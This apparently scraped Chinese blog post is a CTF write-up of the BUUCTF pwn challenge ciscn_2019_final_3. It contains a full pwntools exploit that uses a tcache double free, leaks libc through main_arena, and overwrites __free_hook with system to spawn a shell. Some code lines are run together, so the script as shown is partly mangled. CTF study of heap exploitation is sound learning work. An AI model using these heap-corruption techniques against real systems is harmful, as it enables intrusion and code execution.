[BUUCTF]-PWN:ciscn_2019_final_3解析

2024-02-15 21:36
文章标签 buuctf 解析 2019 final pwn ciscn

本文主要是介绍[BUUCTF]-PWN:ciscn_2019_final_3解析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

查看保护

RELRO保护为FULL,got表不可修改,只能修改hook表了

查看ida

这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)

值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)

这里的libc版本要注意以下,它在题目中给了我们libc库,很巧妙的是这道题的版本选得很刁钻,只要稍微高一点的版本都用不了常规解法中的tcachebin的double free(版本是GLIBC 2.27-3ubuntu1),连ubuntu18.04的libc都不行,最好用题目给的。

完整exp:

from pwn import*
from LibcSearcher import*
context(log_level='debug')
p=process('./final3')
p=remote('node5.buuoj.cn',29058)def alloc(index,size,content):p.sendlineafter(b'choice >',str(1))p.sendlineafter(b'input the index',str(index))p.sendlineafter(b'input the size',str(size))p.sendafter(b'now you can write something',content)
def free(index):p.sendlineafter(b'choice >',str(2))p.sendlineafter(b'input the index',str(index))alloc(0,0x10,b'aaaa')
p.recvuntil(b'gift :')
chunk0=int(p.recv(14),16)
print(hex(chunk0))
alloc(1,0x70,p64(0))
free(0) #这就是这个版本的tcachebin可以进行的double free注意和fastbin的double free区分
free(0)
alloc(2,0x10,p64(chunk0-0x10))
alloc(3,0x10,p64(0))
alloc(4,0x10,p64(0)+p64(0xa1)) #修改chunk0的size为非fastbin的大小
alloc(5,0x78,p64(0))
for i in range(0,8): #连续free填充tcachebin,让堆块进入unsortedbin中free(0)
free(1) #因为释放堆块0让堆块1也处于空闲状态,所以打算利用chunk1泄露libc
alloc(6,0x10,p64(0)) #切割unsortedbin的堆块,因为tcachebin里没有类似大小的堆块,所以可以切割
alloc(7,0x70,b'\x00') #这里填充一个字节的\x00,因为mainarena+88的最后一个字节相对固定。
alloc(8,0x70,b'\x00') #所以不用担心覆盖最后一个字节会影响地址,到时候根据实际再减去一点就行
p.recvuntil(b'gift :')
mainarena88=int(p.recv(14),16)
mainarena=mainarena88-88 #这些地方是根据习惯去写的,实际可能不准,但最后的mallochook肯定是对的
mallochook=mainarena-0x18
libc=LibcSearcher('__malloc_hook',mallochook)
libcbase=mallochook-libc.dump('__malloc_hook')
freehook=libcbase+libc.dump('__free_hook')
system=libcbase+libc.dump('system')
alloc(9,0x50,p64(0))
free(9)
free(9)
alloc(10,0x50,p64(freehook)) #我尝试过用修改malloc来解题,但没试出来
alloc(11,0x50,b'/bin/sh')
payload=p64(system)
alloc(12,0x50,payload)
free(11)
p.interactive()

 这道题个人感觉调试很重要,在这篇文章中的很多地方都不能单纯地用理论去解释,最好还是自己去调试理解,而且这个题目的文件是一个c++编程,与常见的c编程文件更换libc不同,它还需要更换更多的东西,我会再写一篇文章来写更换libc的内容,并将文章链接附加到这篇文章里。

这篇关于[BUUCTF]-PWN:ciscn_2019_final_3解析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/712595

相关文章

网页解析 lxml 库--实战

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库
阅读更多...
【C++】_list常用方法解析及模拟实现

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象
阅读更多...
BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码
阅读更多...
BUUCTF(34)特殊的 BASE64

BUUCTF(34)特殊的 BASE64

使用pycharm时,如果想把代码撤销到之前的状态可以用 Ctrl+z 如果不小心撤销多了,可以用 Ctrl+Shift+Z 还原, 别傻傻的重新敲了 BUUCTF在线评测 (buuoj.cn) 查看字符串,想到base64的变表 这里用的c++的标准程序库中的string,头文件是#include<string> 这是base64的加密函数 std::string
阅读更多...
OWASP十大安全漏洞解析

OWASP十大安全漏洞解析

OWASP(开放式Web应用程序安全项目)发布的“十大安全漏洞”列表是Web应用程序安全领域的权威指南,它总结了Web应用程序中最常见、最危险的安全隐患。以下是对OWASP十大安全漏洞的详细解析: 1. 注入漏洞(Injection) 描述:攻击者通过在应用程序的输入数据中插入恶意代码,从而控制应用程序的行为。常见的注入类型包括SQL注入、OS命令注入、LDAP注入等。 影响:可能导致数据泄
阅读更多...
从状态管理到性能优化:全面解析 Android Compose

从状态管理到性能优化:全面解析 Android Compose

文章目录 引言一、Android Compose基本概念1.1 什么是Android Compose?1.2 Compose的优势1.3 如何在项目中使用Compose 二、Compose中的状态管理2.1 状态管理的重要性2.2 Compose中的状态和数据流2.3 使用State和MutableState处理状态2.4 通过ViewModel进行状态管理 三、Compose中的列表和滚动
阅读更多...
Spring 源码解读:自定义实现Bean定义的注册与解析

Spring 源码解读:自定义实现Bean定义的注册与解析

引言 在Spring框架中,Bean的注册与解析是整个依赖注入流程的核心步骤。通过Bean定义,Spring容器知道如何创建、配置和管理每个Bean实例。本篇文章将通过实现一个简化版的Bean定义注册与解析机制,帮助你理解Spring框架背后的设计逻辑。我们还将对比Spring中的BeanDefinition和BeanDefinitionRegistry,以全面掌握Bean注册和解析的核心原理。
阅读更多...
CSP 2023 提高级第一轮 CSP-S 2023初试题 完善程序第二题解析 未完

CSP 2023 提高级第一轮 CSP-S 2023初试题 完善程序第二题解析 未完

一、题目阅读 (最大值之和)给定整数序列 a0,⋯,an−1,求该序列所有非空连续子序列的最大值之和。上述参数满足 1≤n≤105 和 1≤ai≤108。 一个序列的非空连续子序列可以用两个下标 ll 和 rr(其中0≤l≤r<n0≤l≤r<n)表示,对应的序列为 al,al+1,⋯,ar​。两个非空连续子序列不同,当且仅当下标不同。 例如,当原序列为 [1,2,1,2] 时,要计算子序列 [
阅读更多...
多线程解析报表

多线程解析报表

假如有这样一个需求,当我们需要解析一个Excel里多个sheet的数据时,可以考虑使用多线程,每个线程解析一个sheet里的数据,等到所有的sheet都解析完之后,程序需要提示解析完成。 Way1 join import java.time.LocalTime;public class Main {public static void main(String[] args) thro
阅读更多...
ZooKeeper 中的 Curator 框架解析

ZooKeeper 中的 Curator 框架解析

Apache ZooKeeper 是一个为分布式应用提供一致性服务的软件。它提供了诸如配置管理、分布式同步、组服务等功能。在使用 ZooKeeper 时,Curator 是一个非常流行的客户端库,它简化了 ZooKeeper 的使用,提供了高级的抽象和丰富的工具。本文将详细介绍 Curator 框架,包括它的设计哲学、核心组件以及如何使用 Curator 来简化 ZooKeeper 的操作。 1
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2